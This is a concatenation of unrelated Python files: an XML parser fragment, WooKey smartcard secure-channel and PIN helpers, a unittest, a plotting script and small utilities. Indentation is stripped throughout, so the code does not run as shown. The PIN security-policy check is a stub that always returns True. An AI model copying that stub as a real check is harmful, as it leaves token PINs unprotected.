raise RuntimeError('Expected \'=\', found {0} (around {1})'.format(window[pos], error_context(window, pos, pos)))
if not done and pos == wlen:
need_input = True
pos = backtrackpos
continue
if window[pos] in '"\'':
openattr = window[pos]
attrpat = ATTRIBVALCHAR_SGL if openattr == "'" else ATTRIBVALCHAR_DBL
#backtrackpos = pos
#pos + 1 to skip the opening quote
aval, newpos = handle_cdata(pos+1, window, attrpat, openattr)
if aval == None:
if not done: need_input = True
#Don't advance to newpos, so effectively backtrack
continue
#if window[pos] != openattr:
# raise RuntimeError('Mismatch in attribute quotes')
pos = newpos + 1 #Skip the closing quote
attribs[aname] = aval
curr_state = state.complete_tag
if curr_state == state.in_element:
chars, newpos = handle_cdata(pos, window, DATACHAR, '<')
if chars == None:
if not done: need_input = True
#Don't advance to newpos, so effectively backtrack
continue
pos = newpos
if chars: handler.send((event.characters, chars))
if window[pos] == '<':
pos += 1
#advpos = pos
#if not done and pos == wlen:
# need_input = True
# continue
curr_state = state.pre_tag_gi
if curr_state == state.complete_doc:
if pos == wlen:
break #All done!
#Eat up any whitespace
try:
while window[pos] in ' \r\n\t':
pos += 1
except IndexError:
if not done: need_input = True #Do not advance until we have enough input
continue
#if not done and pos == wlen:
# need_input = True
# continue
if pos == wlen:
break
else:
raise RuntimeError('Junk after document element')
#print('END1')
#print('END2')
sentinel = yield #Avoid StopIteration in parent from running off enf of coroutine?
except GeneratorExit:
#close() called
pass #Any cleanup
except StopIteration:
pass #Any cleanup
return
'''
echo "from amara3.uxml.parser import parsefrags" > /tmp/spam.py
echo "for e in parsefrags(('<spa', 'm>eggs</spam>')): print(e)" >> /tmp/spam.py
#Replace 173 with the position of the line: if curr_state == state.pre_element
python -m pdb -c "b /Users/uche/.local/venv/py3/lib/python3.3/site-packages/amara3/uxml/parser.py:173" /tmp/spam.py
'''
@coroutine
def handler(accumulator):
while True:
event = yield
accumulator.append(event)
return
def parse(text):
acc = []
h = handler(acc)
p = parser(h)
p.send((text, True))
p.close()
h.close()
for event in acc:
yield event
def parsefrags(textfrags):
acc = []
h = handler(acc)
p = parser(h)
#fragcount = len(textfrags)
for i, frag in enumerate(textfrags):
p.send((frag, False))
p.send(('', True)) #Wrap it up
p.close()
h.close()
for event in acc:
yield event
|
# Various utils and helpers related to the WooKey tokens
from smartcard.CardType import AnyCardType
from smartcard.CardRequest import CardRequest
from smartcard.util import toHexString, toBytes
import datetime
from copy import deepcopy
from common_utils import *
from crypto_utils import *
# Helper to communicate with the smartcard
def _connect_to_token(verbose=True):
card = None
try:
card = connect_to_smartcard(verbose)
except:
card = None
return card
def connect_to_token(token_type=None):
card = None
while card == None:
err_msg = "Error: Token undetected."
if token_type != None:
err_msg += " Please insert your '"+token_type+ "' token ..."
card = _connect_to_token(verbose=False)
if card == None:
sys.stderr.write('\r'+err_msg)
sys.stderr.flush()
time.sleep(1)
if card != None:
# Check if we have the proper applet
resp, sw1, sw2 = token_ins(token_type.lower(), "TOKEN_INS_SELECT_APPLET").send(card, verbose=False)
if (sw1 != 0x90) or (sw2 != 0x00):
sys.stderr.write('\r'+"Bad token inserted! Please insert the proper '"+token_type+"' token ...")
sys.stderr.flush()
time.sleep(1)
card = None
return card
# Helper to check the entropy of a string
def check_pin_security_policy(instr):
return True
# Send an APDU using the smartcard library
def send_apdu(cardservice, apdu, verbose=True):
apdu = local_unhexlify(apdu)
a = datetime.datetime.now()
to_transmit = [ord(x) for x in apdu]
response, sw1, sw2 = cardservice.connection.transmit(to_transmit)
b = datetime.datetime.now()
delta = b - a
if verbose == True:
print("> "+local_hexlify(apdu))
print("< SW1=%02x, SW2=%02x, %s" % (sw1, sw2, local_hexlify(''.join([chr(r) for r in response]))))
print(" |= APDU took %d ms" % (int(delta.total_seconds() * 1000)))
return "".join(map(chr, response)), sw1, sw2
# Connect to a smartcard
def connect_to_smartcard(verbose=True):
cardtype = AnyCardType()
cardrequest = CardRequest(timeout=.2, cardType=cardtype)
cardservice = cardrequest.waitforcard()
cardservice.connection.connect()
atr = cardservice.connection.getATR()
if verbose == True:
print("ATR: "+toHexString(atr))
return cardservice
# Decrypt the local pet key using PBKDF2 using the external token
def dec_local_pet_key_with_token(pet_pin, salt, pbkdf2_iterations, enc_master_symmetric_local_pet_key, card, data_type):
## Master symmetric 'pet key' to be used for local credential encryption on the platform
# Use PBKDF2-SHA-512 to derive our local encryption keys
dk = local_pbkdf2_hmac('sha512', pet_pin, salt, pbkdf2_iterations)
master_symmetric_local_pet_key = None
if (card != None):
# Ask for the token to derive and get the local key
resp, sw1, sw2 = token_ins(data_type, "TOKEN_INS_SELECT_APPLET").send(card)
if (sw1 != 0x90) or (sw2 != 0x00):
print("Token Error: bad response from the token when selecting applet")
# This is an error
sys.exit(-1)
master_symmetric_local_pet_key, sw1, sw2 = token_ins(data_type, "TOKEN_INS_DERIVE_LOCAL_PET_KEY", data=dk).send(card)
if (sw1 != 0x90) or (sw2 != 0x00):
print("Token Error: bad response from the token when asking to derive local pet key")
# This is an error
sys.exit(-1)
else:
print("Token Error: card cannont be None ...")
# This is an error
sys.exit(-1)
return master_symmetric_local_pet_key
# Decrypt our local private data
def decrypt_platform_data_with_token(encrypted_platform_bin_file, pin, data_type, card):
return decrypt_platform_data(encrypted_platform_bin_file, pin, data_type, override_local_pet_key_handler = dec_local_pet_key_with_token, card = card)
# This class handles forging APDUs
# NOTE: we only support *short APDUs*, which is sufficient
# for handling our custom secure channel.
class APDU:
cla = None
ins = None
p1 = None
p2 = None
data = None
le = None
apdu_buf = None
def send(self, cardservice, verbose=True):
if (len(self.data) > 255) or (self.le > 256):
print("APDU Error: data or Le too large")
sys.exit(-1)
if self.le == 256:
self.le = 0
# Forge the APDU buffer provided our data
# CLA INS P1 P2
self.apdu_buf = chr(self.cla)+chr(self.ins)+chr(self.p1)+chr(self.p2)
# Do we have data to send?
if self.data != None:
self.apdu_buf += chr(len(self.data))
self.apdu_buf += self.data
if self.le != None:
self.apdu_buf += chr(self.le)
else:
if self.le != None:
self.apdu_buf += chr(self.le)
else:
self.apdu_buf += '\x00'
# Send the APDU through the communication channel
resp, sw1, sw2 = send_apdu(cardservice, local_hexlify(self.apdu_buf), verbose=verbose)
return (resp, sw1, sw2)
def __init__(self, cla, ins, p1, p2, data, le):
self.cla = cla
self.ins = ins
self.p1 = p1
self.p2 = p2
self.data = data
self.le = le
return
# The common instructions
def token_common_instructions(applet_id):
return {
'TOKEN_INS_SELECT_APPLET' : APDU(0x00, 0xA4, 0x04, 0x00, local_unhexlify(applet_id), 0x00),
'TOKEN_INS_SECURE_CHANNEL_INIT' : APDU(0x00, 0x00, 0x00, 0x00, None, 0x00),
'TOKEN_INS_UNLOCK_PET_PIN' : APDU(0x00, 0x01, 0x00, 0x00, None, 0x00),
'TOKEN_INS_UNLOCK_USER_PIN' : APDU(0x00, 0x02, 0x00, 0x00, None, 0x00),
'TOKEN_INS_SET_USER_PIN' : APDU(0x00, 0x03, 0x00, 0x00, None, 0x00),
'TOKEN_INS_SET_PET_PIN' : APDU(0x00, 0x04, 0x00, 0x00, None, 0x00),
'TOKEN_INS_SET_PET_NAME' : APDU(0x00, 0x05, 0x00, 0x00, None, 0x00),
'TOKEN_INS_USER_PIN_LOCK' : APDU(0x00, 0x06, 0x00, 0x00, None, 0x00),
'TOKEN_INS_FULL_LOCK' : APDU(0x00, 0x07, 0x00, 0x00, None, 0x00),
'TOKEN_INS_GET_PET_NAME' : APDU(0x00, 0x08, 0x00, 0x00, None, 0x00),
'TOKEN_INS_GET_RANDOM' : APDU(0x00, 0x09, 0x00, 0x00, None, 0x00),
'TOKEN_INS_DERIVE_LOCAL_PET_KEY': APDU(0x00, 0x0a, 0x00, 0x00, None, 0x00),
# FIXME: to be removed, for debug purposes only!
'TOKEN_INS_ECHO_TEST' : APDU(0x00, 0x0b, 0x00, 0x00, None, 0x00),
'TOKEN_INS_SECURE_CHANNEL_ECHO' : APDU(0x00, 0x0c, 0x00, 0x00, None, 0x00),
}
# The AUTH token instructions
auth_token_instructions = {
'TOKEN_INS_GET_KEY' : APDU(0x00, 0x10, 0x00, 0x00, None, 0x00),
}
# The DFU token instructions
dfu_token_instructions = {
'TOKEN_INS_BEGIN_DECRYPT_SESSION' : APDU(0x00, 0x20, 0x00, 0x00, None, 0x00),
'TOKEN_INS_DERIVE_KEY' : APDU(0x00, 0x21, 0x00, 0x00, None, 0x00),
}
# The SIG token instructions
sig_token_instructions = {
'TOKEN_INS_BEGIN_SIGN_SESSION' : APDU(0x00, 0x30, 0x00, 0x00, None, 0x00),
'TOKEN_INS_DERIVE_KEY' : APDU(0x00, 0x31, 0x00, 0x00, None, 0x00),
'TOKEN_INS_SIGN_FIRMWARE' : APDU(0x00, 0x32, 0x00, 0x00, None, 0x00),
'TOKEN_INS_VERIFY_FIRMWARE' : APDU(0x00, 0x33, 0x00, 0x00, None, 0x00),
'TOKEN_INS_GET_SIG_TYPE' : APDU(0x00, 0x34, 0x00, 0x00, None, 0x00),
}
def token_ins(token_type, instruction, data=None, lc=None):
token_instructions = None
if token_type == "auth":
token_instructions = token_common_instructions("45757477747536417070").copy()
token_instructions.update(auth_token_instructions)
elif token_type == "dfu":
token_instructions = token_common_instructions("45757477747536417071").copy()
token_instructions.update(dfu_token_instructions)
elif token_type == "sig":
token_instructions = token_common_instructions("45757477747536417072").copy()
token_instructions.update(sig_token_instructions)
else:
print("Error: unknown token type "+token_type)
sys.exit(-1)
apdu = deepcopy(token_instructions[instruction])
if (apdu.data == None) and (data != None):
apdu.data = data
if lc != None:
apdu.lc = lc
return apdu
# PIN padding
def pin_padding(pin):
if len(pin) > 15:
print("PIN Error: bad length (> 15) %d" % (len(pin)))
sys.exit(-1)
padded_pin = pin+((15-len(pin))*"\x00")+chr(len(pin))
return padded_pin
# Secure channel class
class SCP:
initialized = False
cardservice = None
IV = None
first_IV = None
AES_Key = None
HMAC_Key = None
dec_firmware_sig_pub_key_data = None
token_type = None
pbkdf2_salt = None
pbkdf2_iterations = None
# Update the sessions keys (on some triggers such as provide/modify a PIN)
def session_keys_update(self, pin):
(mask, _, _) = local_sha256(pin+self.IV)
self.AES_Key = expand(inttostring(stringtoint(self.AES_Key) ^ stringtoint(mask[:16])), 128, "LEFT")
self.HMAC_Key = expand(inttostring(stringtoint(self.HMAC_Key) ^ stringtoint(mask)), 256, "LEFT")
return
# Encrypt/decrypt data with a key derived from the PIN
def pin_decrypt_data(self, pin, data, iv):
(h, _, _) = local_sha256(pin)
(key, _, _) = local_sha256(self.first_IV+h)
key = key[:16]
aes = local_AES.new(key, AES.MODE_CBC, iv=iv)
dec_data = aes.decrypt(data)
return dec_data
def pin_encrypt_data(self, pin, data, iv):
(h, _, _) = local_sha256(pin)
(key, _, _) = local_sha256(self.first_IV+h)
key = key[:16]
aes = local_AES.new(key, AES.MODE_CBC, iv=iv)
enc_data = aes.encrypt(data)
return enc_data
# Send a message through the secure channel
def send(self, orig_apdu, pin=None, update_session_keys=False, pin_decrypt=False):
apdu = deepcopy(orig_apdu)
print("=============================================")
def counter_inc():
curr_iv = expand(inttostring((stringtoint(self.IV))), 128, "LEFT")
self.IV = expand(inttostring((stringtoint(self.IV)+1)), 128, "LEFT")
return str_encode(curr_iv)
if self.initialized == False:
# Secure channel not initialized, quit
print("SCP Error: secure channel not initialized ...")
return None, None, None
# Initialize the hmac
hm = local_hmac.new(self.HMAC_Key, digestmod=hashlib.sha256)
hm.update(self.IV+chr(apdu.cla)+chr(apdu.ins)+chr(apdu.p1)+chr(apdu.p2))
data_to_send = ""
# Empty string means no data in our case!
if apdu.data == "":
apdu.data = None
if apdu.data != None:
print(">>>(encrypted) "+"\033[1;42m["+local_hexlify(apdu.data)+"]\033[1;m")
# Check length
if len(apdu.data) > 255:
print("SCP Error: data size %d too big" % (len(apdu.data)))
return None, None, None
# Encrypt the data
aes = local_AES.new(self.AES_Key, AES.MODE_CTR, counter=counter_inc)
enc_data = aes.encrypt(apdu.data)
hm.update(chr(len(apdu.data))+enc_data)
data_to_send += enc_data
if len(apdu.data) % 16 == 0:
counter_inc()
else:
print(">>>(encrypted) "+"\033[1;42m"+"[]"+"\033[1;m")
counter_inc()
apdu.le = 0
hm.update(chr(apdu.le))
hm_tag = hm.digest()
# Put the encrypted data plus the hmac tag
apdu.data = data_to_send + hm_tag
# Send the APDU on the line
resp, sw1, sw2 = apdu.send(self.cardservice)
# Save the old IV before reception for data encryption inside the channel
old_IV = self.IV
# Check the response HMAC
if resp == None:
print("SCP Error: bad response length (< 32) ...")
return None, None, None
if len(resp) < 32:
print("SCP Error: bad response length %d (< 32) ..." % (len(resp)))
return None, None, None
if len(resp) > 256:
print("SCP Error: response length %d too big" % (len(resp)))
return None, None, None
enc_resp_data = resp[:-32]
resp_hmac_tag = resp[-32:]
hm = local_hmac.new(self.HMAC_Key, digestmod=hashlib.sha256)
hm.update(self.IV+chr(sw1)+chr(sw2))
if len(enc_resp_data) > 0:
hm.update(chr(len(enc_resp_data)))
hm.update(enc_resp_data)
if resp_hmac_tag != hm.digest():
print("SCP Error: bad response HMAC")
return None, None, None
# Now decrypt the data
if len(enc_resp_data) > 0:
aes = local_AES.new(self.AES_Key, AES.MODE_CTR, counter=counter_inc)
dec_resp_data = aes.decrypt(enc_resp_data)
print("<<<(decrypted) SW1=%02x, SW2=%02x, \033[1;43m[%s]\033[1;m" % (sw1, sw2, local_hexlify(dec_resp_data)))
if len(enc_resp_data) % 16 == 0:
counter_inc()
else:
counter_inc()
dec_resp_data = None
print("<<<(decrypted) SW1=%02x, SW2=%02x, \033[1;43m[]\033[1;m" % (sw1, sw2))
if (update_session_keys == True) and (sw1 == 0x90) and (sw2 == 0x00):
# We need the PIN for this command
if pin == None:
print("SCP Error: asking for update_session_keys without providing the PIN!")
return None, None, None
self.session_keys_update(pin_padding(pin))
# Do we have to decrypt data inside the channel?
if (pin_decrypt == True) and (sw1 == 0x90) and (sw2 == 0x00):
if pin == None:
print("SCP Error: asking for pin_decrypt without providing the PIN!")
return None, None, None
dec_resp_data = self.pin_decrypt_data(pin, dec_resp_data, old_IV)
return dec_resp_data, sw1, sw2
# Initialize the secure channel
def __init__(self, card, encrypted_platform_bin_file, pin, data_type):
self.cardservice = card
self.token_type = data_type
# Decrypt local platform keys. We also keep the current salt and PBKDF2 iterations for later usage
dec_token_pub_key_data, dec_platform_priv_key_data, dec_platform_pub_key_data, self.dec_firmware_sig_pub_key_data, _, _, self.pbkdf2_salt, self.pbkdf2_iterations = decrypt_platform_data_with_token(encrypted_platform_bin_file, pin, data_type, card)
# Get the algorithm and the curve
ret_alg, ret_curve, prime, a, b, gx, gy, order, cofactor = get_curve_from_key(dec_platform_pub_key_data)
if (ret_alg == None) or (ret_curve == None):
print("SCP Error: unkown curve or algorithm in the structured keys ...")
sys.exit(-1)
# Instantiate it
c = Curve(a, b, prime, order, cofactor, gx, gy, cofactor * order, ret_alg, None)
# Generate a key pair for our ECDH
ecdh_keypair = genKeyPair(c)
# Sign the public part with our ECDSA private key
ecdsa_pubkey = PubKey(c, Point(c, stringtoint(dec_platform_pub_key_data[3:3+32]), stringtoint(dec_platform_pub_key_data[3+32:3+64])))
ecdsa_privkey = PrivKey(c, stringtoint(dec_platform_priv_key_data[3:]))
ecdsa_keypair = KeyPair(ecdsa_pubkey, ecdsa_privkey)
to_send = expand(inttostring(ecdh_keypair.pubkey.Y.x), 256, "LEFT")
to_send += expand(inttostring(ecdh_keypair.pubkey.Y.y), 256, "LEFT")
to_send += "\x00"*31+"\x01"
(sig, k) = ecdsa_sign(sha256, ecdsa_keypair, to_send)
to_send += sig
# Mount the secure channel with the token
# Note: the applet should have been already selected by our decrypt_platform_data procedure
# since we have already exchanged data with the card
apdu = token_ins("sig", "TOKEN_INS_SECURE_CHANNEL_INIT", data=to_send)
resp, sw1, sw2 = apdu.send(self.cardservice)
if (sw1 != 0x90) or (sw2 != 0x00):
# This is an error
print("SCP Error: bad response from the token")
sys.exit(-1)
if len(resp) != ((3*32) + 64):
# This is not the response length we expect ...
print("SCP Error: bad response from the token")
sys.exit(-1)
# Extract the ECDSA signature
ecdsa_token_pubkey = PubKey(c, Point(c, stringtoint(dec_token_pub_key_data[3:3+32]), stringtoint(dec_token_pub_key_data[3+32:3+64])))
ecdsa_token_sig = resp[3*32:]
check_sig = ecdsa_verify(sha256, KeyPair(ecdsa_token_pubkey, None), resp[:3*32], ecdsa_token_sig)
if check_sig == False:
# Bad signature
print("SCP Error: bad ECDSA signature in response from the token")
return
# Extract ECDH point and compute the scalar multiplication
ecdh_shared_point = (ecdh_keypair.privkey.x) * Point(c, stringtoint(resp[:32]), stringtoint(resp[32:64]))
ecdh_shared_secret = expand(inttostring(ecdh_shared_point.x), 256, "LEFT")
# Derive our keys
# AES Key = SHA-256("AES_SESSION_KEY" | shared_secret) (first 128 bits)
(self.AES_Key, _, _) = local_sha256("AES_SESSION_KEY"+ecdh_shared_secret)
self.AES_Key = self.AES_Key[:16]
# HMAC Key = SHA-256("HMAC_SESSION_KEY" | shared_secret) (256 bits)
(self.HMAC_Key, _, _) = local_sha256("HMAC_SESSION_KEY"+ecdh_shared_secret)
# IV = SHA-256("SESSION_IV" | shared_secret) (first 128 bits)
(self.IV, _, _) = local_sha256("SESSION_IV"+ecdh_shared_secret)
self.IV = self.IV[:16]
self.first_IV = self.IV
# The secure channel is now initialized
self.initialized = True
return
# ====== Common token helpers
# Helper to unlock PET PIN
def token_unlock_pet_pin(self, pet_pin):
return self.send(token_ins(self.token_type, "TOKEN_INS_UNLOCK_PET_PIN", data=pin_padding(pet_pin)), pin=pet_pin, update_session_keys=True)
# Helper to unlock user PIN
def token_unlock_user_pin(self, user_pin = None):
if user_pin == None:
user_pin = get_user_input("Please provide "+self.token_type.upper()+" USER pin:\n")
return self.send(token_ins(self.token_type, "TOKEN_INS_UNLOCK_USER_PIN", data=pin_padding(user_pin)), pin=user_pin, update_session_keys=True)
# Helper to get the PET name
def token_get_pet_name(self):
return self.send(token_ins(self.token_type, "TOKEN_INS_GET_PET_NAME"))
# Helpers to lock the token
def token_user_pin_lock(self):
return self.send(token_ins(self.token_type, "TOKEN_INS_USER_PIN_LOCK"))
def token_full_lock(self):
return self.send(token_ins(self.token_type, "TOKEN_INS_FULL_LOCK"))
# Helper to set the user PIN
def token_set_user_pin(self, new_user_pin = None):
if new_user_pin == None:
new_user_pin = get_user_input("Please provide the *new* "+self.token_type.upper()+" user PIN:\n")
return self.send(token_ins(self.token_type, "TOKEN_INS_SET_USER_PIN", data=pin_padding(new_user_pin)), pin=new_user_pin, update_session_keys=True)
# Helper to set the PET PIN
def token_set_pet_pin(self, new_pet_pin = None):
if new_pet_pin == None:
new_pet_pin = get_user_input("Please provide the *new* "+self.token_type.upper()+" PET PIN:\n")
# We compute and send the PBKDF2 of the new PET PIN
dk = local_pbkdf2_hmac('sha512', new_pet_pin, self.pbkdf2_salt, self.pbkdf2_iterations)
return self.send(token_ins(self.token_type, "TOKEN_INS_SET_PET_PIN", data=pin_padding(new_pet_pin)+dk), pin=new_pet_pin, update_session_keys=True)
# Helper to set the PET name
def token_set_pet_name(self, new_pet_name = None):
if new_pet_name == None:
new_pet_name = get_user_input("Please provide the *new* "+self.token_type.upper()+" PET name:\n")
return self.send(token_ins(self.token_type, "TOKEN_INS_SET_PET_NAME", data=new_pet_name))
def token_get_random(self, size):
if size > 255:
# This is an error
print("Token Error: bad length %d > 255 for TOKEN_INS_GET_RANDOM" % (size))
return None, None, None
return self.send(token_ins(self.token_type, "TOKEN_INS_GET_RANDOM", data=chr(size)))
def token_echo_test(self, data):
return self.send(token_ins(self.token_type, "TOKEN_INS_ECHO_TEST", data=data))
def token_secure_channel_echo(self, data):
return self.send(token_ins(self.token_type, "TOKEN_INS_SECURE_CHANNEL_ECHO", data=data))
# ====== AUTH specific helpers
def token_auth_get_key(self, pin):
if self.token_type != "auth":
print("AUTH Token Error: asked for TOKEN_INS_GET_KEY for non AUTH token ("+self.token_type.upper()+")")
# This is an error
return None, None, None
return self.send(token_ins(self.token_type, "TOKEN_INS_GET_KEY"), pin=pin, pin_decrypt=True)
# ====== DFU specific helpers
def token_dfu_begin_decrypt_session(self, header_data):
if self.token_type != "dfu":
print("DFU Token Error: asked for TOKEN_INS_BEGIN_DECRYPT_SESSION for non DFU token ("+self.token_type.upper()+")")
# This is an error
return None, None, None
return self.send(token_ins(self.token_type, "TOKEN_INS_BEGIN_DECRYPT_SESSION", data=header_data))
def token_dfu_derive_key(self, chunk_num):
if self.token_type != "dfu":
print("DFU Token Error: asked for TOKEN_INS_DERIVE_KEY for non DFU token ("+self.token_type.upper()+")")
# This is an error
return None, None, None
return self.send(token_ins(self.token_type, "TOKEN_INS_DERIVE_KEY", data=chr((chunk_num >> 8) & 0xff)+chr(chunk_num & 0xff)))
# ====== SIG specific helpers
def token_sig_begin_sign_session(self, header_data):
if self.token_type != "sig":
print("SIG Token Error: asked for TOKEN_INS_BEGIN_SIGN_SESSION for non SIG token ("+self.token_type.upper()+")")
# This is an error
return None, None, None
return self.send(token_ins(self.token_type, "TOKEN_INS_BEGIN_SIGN_SESSION", data=header_data))
def token_sig_derive_key(self, chunk_num):
if self.token_type != "sig":
print("SIG Token Error: asked for TOKEN_INS_DERIVE_KEY for non SIG token ("+self.token_type.upper()+")")
# This is an error
return None, None, None
return self.send(token_ins(self.token_type, "TOKEN_INS_DERIVE_KEY", data=chr((chunk_num >> 8) & 0xff)+chr(chunk_num & 0xff)))
def token_sig_sign_firmware(self, to_sign):
if self.token_type != "sig":
print("SIG Token Error: asked for TOKEN_INS_SIGN_FIRMWARE for non SIG token ("+self.token_type.upper()+")")
# This is an error
return None, None, None
return self.send(token_ins(self.token_type, "TOKEN_INS_SIGN_FIRMWARE", data=to_sign))
def token_sig_verify_firmware(self, to_verify):
if self.token_type != "sig":
print("SIG Token Error: asked for TOKEN_INS_VERIFY_FIRMWARE for non SIG token ("+self.token_type.upper()+")")
# This is an error
return None, None, None
return self.send(token_ins(self.token_type, "TOKEN_INS_VERIFY_FIRMWARE", data=to_verify))
def token_sig_get_sig_type(self):
if self.token_type != "sig":
print("SIG Token Error: asked for TOKEN_INS_GET_SIG_TYPE for non SIG token ("+self.token_type.upper()+")")
# This is an error
return None, None, None
return self.send(token_ins(self.token_type, "TOKEN_INS_GET_SIG_TYPE"))
# Helper to fully unlock a token, which is the first step to
# access advanced features of a token
def token_full_unlock(card, token_type, local_keys_path, pet_pin = None, user_pin = None, force_pet_name_accept = False):
# ======================
# Get the PET PIN for local ECDH keys decryption
if pet_pin == None:
pet_pin = get_user_input("Please provide "+token_type.upper()+" PET pin:\n")
# Establish the secure channel with the token
scp = SCP(card, local_keys_path, pet_pin, token_type)
resp, sw1, sw2 = scp.token_unlock_pet_pin(pet_pin)
if (sw1 != 0x90) or (sw2 != 0x00):
print("\033[1;41m Error: PET pin seems wrong! Beware that only %d tries are allowed ...\033[1;m" % ord(resp[0]))
sys.exit(-1)
resp, sw1, sw2 = scp.token_get_pet_name()
if (sw1 != 0x90) or (sw2 != 0x00):
print("\033[1;41m Error: something wrong happened when getting the PET name ...\033[1;m")
sys.exit(-1)
if force_pet_name_accept == False:
answer = None
while answer != "y" and answer != "n":
answer = get_user_input("\033[1;44m PET NAME CHECK! \033[1;m\n\nThe PET name for the "+token_type.upper()+" token is '"+resp+"', is it correct? Enter y to confirm, n to cancel [y/n].")
if answer != "y":
sys.exit(-1)
else:
print("\033[1;44m PET NAME CHECK! \033[1;m\n\nThe PET name for the "+token_type.upper()+" token is '"+resp+"' ...")
resp, sw1, sw2 = scp.token_unlock_user_pin(user_pin)
if (sw1 != 0x90) or (sw2 != 0x00):
print("\033[1;41m Error: USER pin seems wrong! Beware that only %d tries are allowed ...\033[1;m" % ord(resp[0]))
sys.exit(-1)
return scp
|
import unittest
from datetime import datetime
from test.support import captured_stdout
from src.entity.count_entity import CountEntity
from src.interface_adapter.in_memory_count_repository import \
InMemoryCountRepository
from src.interface_adapter.report_count_presenter import ReportCountPresenter
from src.use_case.report_count_use_case_interactor import \
ReportCountUseCaseInteractor
class TestReportCountUseCaseInteractor(unittest.TestCase):
def setUp(self) -> None:
self.repository = InMemoryCountRepository()
self.presenter = ReportCountPresenter()
dates = [datetime(2020, 1, 1), datetime(2020, 1, 2)]
counts = [CountEntity(dates[0], "increase", 2),
CountEntity(dates[0], "no_change", 2),
CountEntity(dates[0], "decrease", 2),
CountEntity(dates[0], "disappear", 2),
CountEntity(dates[1], "increase", 4),
CountEntity(dates[1], "no_change", 2),
CountEntity(dates[1], "decrease", 1),
CountEntity(dates[1], "appear", 2)]
self.repository.save_timestamps(dates)
self.repository.save(counts)
return super().setUp()
def test_create(self):
# Execute
ReportCountUseCaseInteractor(self.repository, self.presenter)
# @unittest.skip('after InMemoryRepository.get_timestamps')
def test_handle(self):
# Execute
interactor = ReportCountUseCaseInteractor(
self.repository, self.presenter)
with captured_stdout() as stdout:
interactor.handle()
# Assert
self.assertIn('4 ( +2) increase', stdout.getvalue())
self.assertIn('2 ( +0) no_change', stdout.getvalue())
self.assertIn('1 ( -1) decrease', stdout.getvalue())
self.assertIn('2 ( +2) appear', stdout.getvalue())
self.assertIn('0 ( -2) disappear', stdout.getvalue())
self.assertIn('9 ( +1) TOTAL', stdout.getvalue())
|
import numpy as np
import os
import utils.utils as util
import pylab
def setFigLinesBW(fig):
"""
Take each axes in the figure, and for each line in the axes, make the
line viewable in black and white.
"""
for ax in fig.get_axes():
setAxLinesBW(ax)
def setAxLinesBW(ax):
"""
Take each Line2D in the axes, ax, and convert the line style to be
suitable for black and white viewing.
"""
MARKERSIZE = 3
COLORMAP = {
'r': {'marker': "None", 'dash': (None, None)},
'g': {'marker': "None", 'dash': (None, None)},
'm': {'marker': "None", 'dash': (None, None)},
'b': {'marker': "None", 'dash': (None, None)},
'c': {'marker': "None", 'dash': (None, None)},
'y': {'marker': "None", 'dash': (None, None)},
'k': {'marker': 'None', 'dash': (None, None)} # [1,2,1,10]}
}
for line in ax.get_lines():
origColor = line.get_color()
line.set_dashes(COLORMAP[origColor]['dash'])
line.set_marker(COLORMAP[origColor]['marker'])
line.set_markersize(MARKERSIZE)
def get_csf_ls(base_dir,number):
CSF_dir = os.path.join(base_dir)
csf_conv5_ls,csf_fc6_ls,csf_fc7_ls,x = [],[],[],[]
for i in range(number):
CSF_sub_dir = os.path.join(CSF_dir,str(i),'metric.json')
CSF = util.load_metric_json(CSF_sub_dir)
csf_conv5,csf_fc6,csf_fc7 = CSF['contrast_conv5'],CSF['contrast_fc'],CSF['contrast_embedding']
csf_conv5_ls.append(csf_conv5),csf_fc6_ls.append(csf_fc6),csf_fc7_ls.append(csf_fc7),x.append(i)
return csf_conv5_ls,csf_fc6_ls,csf_fc7_ls,x
def main():
l2_base_dir = '/media/admin228/00027E210001A5BD/train_pytorch/change_detection/CMU/prediction_cons/l2_5,6,7/roc'
cos_base_dir = '/media/admin228/00027E210001A5BD/train_pytorch/change_detection/CMU/prediction_cons/dist_cos_new_5,6,7/roc'
CSF_dir = os.path.join(l2_base_dir)
CSF_fig_dir = os.path.join(l2_base_dir,'fig.png')
end_number = 22
csf_conv5_l2_ls,csf_fc6_l2_ls,csf_fc7_l2_ls,x_l2 = get_csf_ls(l2_base_dir,end_number)
csf_conv5_cos_ls,csf_fc6_cos_ls,csf_fc7_cos_ls,x_cos = get_csf_ls(cos_base_dir,end_number)
Fig = pylab.figure()
setFigLinesBW(Fig)
#pylab.plot(x,csf_conv4_ls, color='k',label= 'conv4')
pylab.plot(x_l2,csf_conv5_l2_ls, color='m',label= 'l2:conv5')
pylab.plot(x_l2,csf_fc6_l2_ls, color = 'b',label= 'l2:fc6')
pylab.plot(x_l2,csf_fc7_l2_ls, color = 'g',label= 'l2:fc7')
pylab.plot(x_cos,csf_conv5_cos_ls, color='c',label= 'cos:conv5')
pylab.plot(x_cos,csf_fc6_cos_ls, color = 'r',label= 'cos:fc6')
pylab.plot(x_cos,csf_fc7_cos_ls, color = 'y',label= 'cos:fc7')
pylab.legend(loc='lower right', prop={'size': 10})
pylab.ylabel('RMS Contrast', fontsize=14)
pylab.xlabel('Epoch', fontsize=14)
pylab.savefig(CSF_fig_dir)
if __name__ == '__main__':
main()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# droxi
# Copyright (c) 2014, Andrew Robbins, All rights reserved.
#
# This library ("it") is free software; it is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; you can redistribute it and/or modify it under the terms of the
# GNU Lesser General Public License ("LGPLv3") <https://www.gnu.org/licenses/lgpl.html>.
from __future__ import absolute_import
from __future__ import print_function
from ...models import Sym
from ..config import DROSOFT_CDBASE
from .null import DNull
class DPrint(Sym):
_symbolCdbase = DROSOFT_CDBASE
_symbolCd = 'prog2'
_symbolName = 'print'
url = _symbolCdbase + '/' + _symbolCd + '#' + _symbolName
def __call__(self, *args):
import sys
print(*map(str, args), end='', file=sys.stderr)
return DNull()
class DPrintLine(Sym):
_symbolCdbase = DROSOFT_CDBASE
_symbolCd = 'prog2'
_symbolName = 'println'
url = _symbolCdbase + '/' + _symbolCd + '#' + _symbolName
def __call__(self, *args):
import sys
print(*map(str, args), file=sys.stderr)
return DNull()
|
import random
def double(x):
return x * 2
def test_executor_basic(fx, try_tutorial_endpoint):
"""Test executor interface"""
x = random.randint(0, 100)
fut = fx.submit(double, x, endpoint_id=try_tutorial_endpoint)
assert fut.result(timeout=10) == x * 2, "Got wrong answer"
|
def binarySearch(array, key):
start = 0
end = len(array) - 1
while start <= end:
mid = (start + end) // 2
guess = array[mid]
# Guess => low
if guess < key:
start = mid + 1
# Guess => High
elif guess > key:
end = mid - 1
else:
return mid
return None
